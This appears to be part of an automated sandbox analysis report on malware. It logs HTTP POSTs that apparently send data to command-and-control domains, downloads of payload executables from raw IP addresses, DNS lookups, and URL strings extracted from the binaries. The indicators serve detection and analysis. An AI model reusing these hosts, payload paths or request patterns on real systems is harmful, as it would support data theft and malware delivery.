                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----RIWTJMYCJW47QQ1N7GVSUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 6990993Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7QQIEKNGVAAAAIE3O8Q1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAS00R1VAI58YM7QQ9ZMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KNG4E3OZMOZUAAASJ5PHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 98109Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7G4EUSR9RI58QQIWT0ZCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCTR1D2DTRQQIMGVASJ5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LZ2TDEBO9OACBMY1PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12829Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TGK5TG3JF0VQC7JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16318Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RJ1WRGS92MXJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20531Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OB5GESMA7TJHBD19User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1324Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZUC21LJAWQQ7NHPAYINUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550509Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V6CFHUA8V8CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12793Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y2UHFZ6F0HL64User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16306Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UEPHLGKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20507Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UUGL188587SJMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1384Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6VAL1Q0VC29M6V4QGEXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552013Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3CHJD06363N7AUMNRA3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QA4UGRJSEIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16288Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OBCE95YTAIY33User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20537Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6ZSRSNKIRLF8JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1355Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KH6LATDDPJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 29525Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: discokeyus.lat
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0005E0C0 recv,recv,recv,recv,0_2_0005E0C0
                          Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                          Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/Krokodyl02/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/loadman/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/wicked/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851?argument=McrSMDEQlisW3cFq1734740102 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
                          Source: global trafficHTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Thu, 19 Dec 2024 14:25:14 GMTIf-None-Match: "67642cca-5600"
                          Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficDNS traffic detected: DNS query: bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmO
                          Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                          Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                          Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                          Source: global trafficDNS traffic detected: DNS query: pancakedipyps.click
                          Source: global trafficDNS traffic detected: DNS query: t.me
                          Source: global trafficDNS traffic detected: DNS query: frostman.shop
                          Source: global trafficDNS traffic detected: DNS query: httpbin.org
                          Source: global trafficDNS traffic detected: DNS query: home.fivetk5ht.top
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: treehoneyi.click
                          Source: global trafficDNS traffic detected: DNS query: apis.google.com
                          Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                          Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                          Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                          Source: global trafficDNS traffic detected: DNS query: assets.msn.cn
                          Source: global trafficDNS traffic detected: DNS query: staticview.msn.com
                          Source: global trafficDNS traffic detected: DNS query: fivetk5ht.top
                          Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
                          Source: skotes.exe, 00000005.00000003.3334552390.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exe
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: Saved.28.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                          Source: Saved.28.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                          Source: Saved.28.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                          Source: Saved.28.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                          Source: Saved.28.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                          Source: db77c3e215.exe, 0000002E.00000003.3039830752.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 3f5e6ed253.exe, 00000033.00000002.3375144343.0000000003DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
                          Source: 3dd71a48b2.exe, 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmp, 3dd71a48b2.exe, 0000001C.00000000.2901359460.0000000000409000.00000002.00000001.01000000.0000000D.sdmp, 3dd71a48b2.exe.5.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: http://ocsp.comodoca.com0
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: Saved.28.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: http://ocsp.sectigo.com0
                          Source: Saved.28.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                          Source: Saved.28.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                          Source: Saved.28.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://ocsps.ssl.com0
                          Source: Saved.28.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                          Source: Saved.28.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
